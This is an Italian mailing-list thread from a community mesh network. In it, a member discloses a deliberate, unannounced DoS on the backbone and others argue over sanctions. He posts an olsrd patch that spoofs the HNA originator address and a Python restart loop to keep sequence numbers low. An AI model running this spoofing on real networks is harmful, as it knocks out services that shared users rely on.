<p dir="ltr">Arka Buona Domenica anche a te<br>
Perdona la dimenticanza.</p>
<div class="gmail_quote">Il 25/mag/2014 12:27 "Andrea Pescetelli" <<a href="mailto:andrea.pescetelli@gmail.com">andrea.pescetelli@gmail.com</a>> ha scritto:<br type="attribution"><blockquote class="gmail_quote" style="margin:0 0 0 .8ex;border-left:1px #ccc solid;padding-left:1ex">
<div dir="ltr"><div><div><div><div><div><div><div><div>Non è sminuendo la cosa che si risolve il problema.<br></div>Dove andare a colpire in un azione premeditata?<br></div>I servizi di tutti perchè ZioProto se ne frega della chat dove gli altri fanno gsoc e scambiano opinioni.<br>

</div>Dove? Nella Farm che lui stesso non approva e guarda caso dove ci sta anche casa mia dove forse per qualche motivo in un futuro avrebbe potuto girarci anche il blog che gyardacaso non approva.<br></div>Quale subnet? La pubbica della farm e perchè non quella dove ci sta anche il mail server di Nino?<br>

</div>Quale target? Una macchina guarda caso di casa al mare di Pierluigi che abbiamo sostituito giovedi' insieme ad altre 3 perchè seccate da un fulmine quindo oltre al culo per sistemare pura la presa per il culo a fare la caccia alle streghe di un danno provocato senza avviso.<br>

<br></div>No grazie se devo bestemmiare allora bestemmio e questo non è relax ma danno provocato e torno a ripetere che un provvedimento simbolico va preso.<br></div>Non mi curo che sia ZioProto o qualsiasi altro ma che sia di esempio.<br>

<br></div>Se per voi questa è ninux allora non utilizzate i servizi che non approvate e fate un passo indietro.<br><div><div><div><br><div><div><div><div><div><br></div></div></div></div></div></div></div></div></div><div class="gmail_extra">

<br><br><div class="gmail_quote">Il giorno 25 maggio 2014 12:16, Alessandro (aka ArkaNet) <span dir="ltr"><<a href="mailto:arkantiko@gmail.com" target="_blank">arkantiko@gmail.com</a>></span> ha scritto:<br><blockquote class="gmail_quote" style="margin:0 0 0 .8ex;border-left:1px #ccc solid;padding-left:1ex">

<div dir="ltr">Hola!<div><br></div><div>Fish hai ragione dobbiamo fare qualcosa!!</div><div>Sicuramente ZioProTo ci sta facendo capire quanto sia semplice per un macellaio utilizzare un coltello.</div><div>Cosa dovremmo aver acquisito alla luce di ciò?</div>


<div>Che se arrivasse un assassino e si impadronisse del coltello, farebbe una strage!</div><div><br></div><div>Ora, senza troppe metafore, ci siamo resi conto che se qualcuno ha voglia (e capacità) può farci male.</div>

<div>
I provvedimenti dobbiamo prenderli per evitare minacce *esterne*, e che sicuramente non avvisino prima di agire!</div><div>Dire che Saverio sia una minaccia sarebbe come entrare in chiesa e bestemmiare, insomma ... non si fa ;)</div>


<div><br></div><div><div class="gmail_extra">Se vogliamo una rete 'pronta' e con una certa resilienza, dobbiamo costruircela. A volte non basta fare il link migliore per poter dire di avere una struttura solida.</div>


<div class="gmail_extra">Abbiamo anche bisogno di un motore che spinga!</div><div class="gmail_extra"><br></div><div class="gmail_extra">E poi ricordiamoci che ninux fa rima con relax!</div><div class="gmail_extra"><br></div>


<div class="gmail_extra">Io direi "fortuna che era un'azione controllata!" (e fatta apposta per essere controllabile)</div><div class="gmail_extra"><br></div><div class="gmail_extra">Bella && Buona Domenica @tutti</div>


<div class="gmail_extra"><br clear="all"><div><div dir="ltr"><pre cols="72"><span style="background-color:rgb(255,255,255);white-space:normal"><font face="'comic sans ms', sans-serif"><pre cols="72"><i>--
Arka</i></pre></font></span></pre></div></div>
<br><br><div class="gmail_quote">Il giorno 25 maggio 2014 09:37, Andrea Pescetelli <span dir="ltr"><<a href="mailto:andrea.pescetelli@gmail.com" target="_blank">andrea.pescetelli@gmail.com</a>></span> ha scritto:<div>

<div><br>
<blockquote class="gmail_quote" style="margin:0 0 0 .8ex;border-left:1px #ccc solid;padding-left:1ex"><p dir="ltr">Ciao<br>
Vorrei chiedere di prendere provvedimenti seri a seguito di questi eventi e comportamenti che da una settimana stanno invalidando sia il rispetto reciproco sia il buon finzionamento della rete stessa da parte di Saverio Proto.</p>




<div class="gmail_quote">Il 25/mag/2014 09:07 "Alessandro Gnagni" <<a href="mailto:alessandro@gnagni.it" target="_blank">alessandro@gnagni.it</a>> ha scritto:<br type="attribution"><blockquote class="gmail_quote" style="margin:0 0 0 .8ex;border-left:1px #ccc solid;padding-left:1ex">


<div><div>
<p dir="ltr">Non è qualche ora. Va avanti da giovedì mattina.<br>
Ma almeno avvisare? Uno non può perdere tempo appresso a ste cose...<br>
Jabber è stato ko da giovedì per sta cosa. </p>
<div class="gmail_quote">Il 25/mag/2014 01:03 "Saverio Proto" <<a href="mailto:zioproto@gmail.com" target="_blank">zioproto@gmail.com</a>> ha scritto:<br type="attribution"><blockquote class="gmail_quote" style="margin:0 0 0 .8ex;border-left:1px #ccc solid;padding-left:1ex">




Ciao,<br>
<br>
Metto in Cc: anche <a href="mailto:wireless@ml.ninux.org" target="_blank">wireless@ml.ninux.org</a> perché questa email contiene<br>
informazioni tecniche interessanti.<br>
<br>
bravi, avete risolto il problema in fretta :) Ho volutamente provato<br>
un attacco DoS sul backbone per capire che effetto poteva avere.<br>
<br>
ecco la patch di olsrd con cui generavo l'attacco DoS<br>
<br>
diff --git a/src/build_msg.c b/src/build_msg.c<br>
index 109f955..e252981 100644<br>
--- a/src/build_msg.c<br>
+++ b/src/build_msg.c<br>
@@ -1021,7 +1021,11 @@ serialize_hna4(struct interface *ifp)<br>
   m = (union olsr_message *)msg_buffer;<br>
<br>
   /* Fill header */<br>
-  m->v4.originator = olsr_cnf->main_addr.v4.s_addr;<br>
+  struct in_addr fakesource;<br>
+  fakesource.s_addr = 0;<br>
+  //inet_hton(2956867021,&fakesource);<br>
+  inet_aton("172.16.40.40",&fakesource);<br>
+  m->v4.originator = fakesource.s_addr;<br>
   m->v4.hopcnt = 0;<br>
   m->v4.ttl = MAX_TTL;<br>
   m->v4.olsr_msgtype = HNA_MESSAGE;<br>
<br>
<br>
una domanda,<br>
<br>
se avessi patchato anche:<br>
<br>
m->v4.hopcnt = XXX<br>
<br>
mettendo numeri casuali..<br>
<br>
sarebbe stato altrettanto facile capire chi è che iniettava questi messaggi ?<br>
<br>
mi sto divertendo parecchio con questi attacchi DoS, sono molto<br>
istruttivi. Per chi vuole giocare insieme a me a programmare in C<br>
possiamo approfondire il giovedi sera al Sans Papiers. (Il prossimo<br>
che vorrei provare è DrDoS su snmp).<br>
<br>
un problema di questo attacco sono cmq i sequence number. Per rendere<br>
l'attacco efficace ho dovuto far andare la mia instanza patchata di<br>
OLSR a singhiozzo:<br>
<br>
import os<br>
import time<br>
<br>
while True:<br>
        os.system("olsrd")<br>
        print "started\n"<br>
        time.sleep(120)<br>
        os.system("killall olsrd")<br>
        print "killed\n"<br>
        time.sleep(300)<br>
<br>
in quanto avevo bisogno che i miei sequence number dovevano sempre<br>
essere piu bassi di quelli del spoofato, altrimenti venivano scartati<br>
come out of sequence.<br>
<br>
vi va di scrivere insieme un articoletto per il blog ? Io scrivo la<br>
parte di come ti costruisce l'attacco e voi la parte di come avete<br>
fatto ad identificare il nodo spoofato ?<br>
<br>
ho staccatto il nodo attaccante, il gioco è finito :)<br>
<br>
ah... vi prego nessun malumore per qualche oretta di disservizi, this<br>
is Ninux. Si fanno queste cose perché ci si diverte insieme.<br>
<br>
ciao :)<br>
<br>
Saverio<br>
<br>
Il 24 maggio 2014 23:23, Andrea Pescetelli<br>
<<a href="mailto:andrea.pescetelli@gmail.com" target="_blank">andrea.pescetelli@gmail.com</a>> ha scritto:<br>
> Saverio,<br>
> Abbiamo rilevato che dal nodo Gallia viene generato un messaggio olsr hna<br>
> con originator 172.16.40.40, validity time 570, hna <a href="http://176.62.53.192/28" target="_blank">176.62.53.192/28</a><br>
> proveniente dal nodo in oggetto.<br>
><br>
> Questo problema sta oscurando diversi servizi di ninux in farm appartenenti<br>
> a quella subnet.<br>
><br>
> Abbiamo triangolato la posizione basandoci sugli hop count dei cammini<br>
> multipli.<br>
> puoi verificare?<br>
><br>
> Grazie<br>
><br>
> Fish, Hispanico, Halino<br>
> --<br>
> Andrea Pescetelli aka Fish<br>
> Skype: andrea5742<br>
> Ninux int: 5001/5002<br>
> Mobile: <a href="tel:%2B39%203891156050" value="+393891156050" target="_blank">+39 3891156050</a><br>
><br>
><br>
><br>
><br>
</blockquote></div>
<br></div></div>_______________________________________________<br>
Wireless mailing list<br>
<a href="mailto:Wireless@ml.ninux.org" target="_blank">Wireless@ml.ninux.org</a><br>
<a href="http://ml.ninux.org/mailman/listinfo/wireless" target="_blank">http://ml.ninux.org/mailman/listinfo/wireless</a><br>
<br></blockquote></div>
</blockquote></div></div></div><br></div></div></div>
</blockquote></div><br><br clear="all"><br>-- <br><div dir="ltr"><div>Andrea Pescetelli aka Fish<br></div>Skype: andrea5742<br><div>Ninux int: 5001/5002<br>Mobile: <a href="tel:%2B39%203891156050" value="+393891156050" target="_blank">+39 3891156050</a><br>
<pre><br></pre><br><br></div></div>
</div>
</blockquote></div>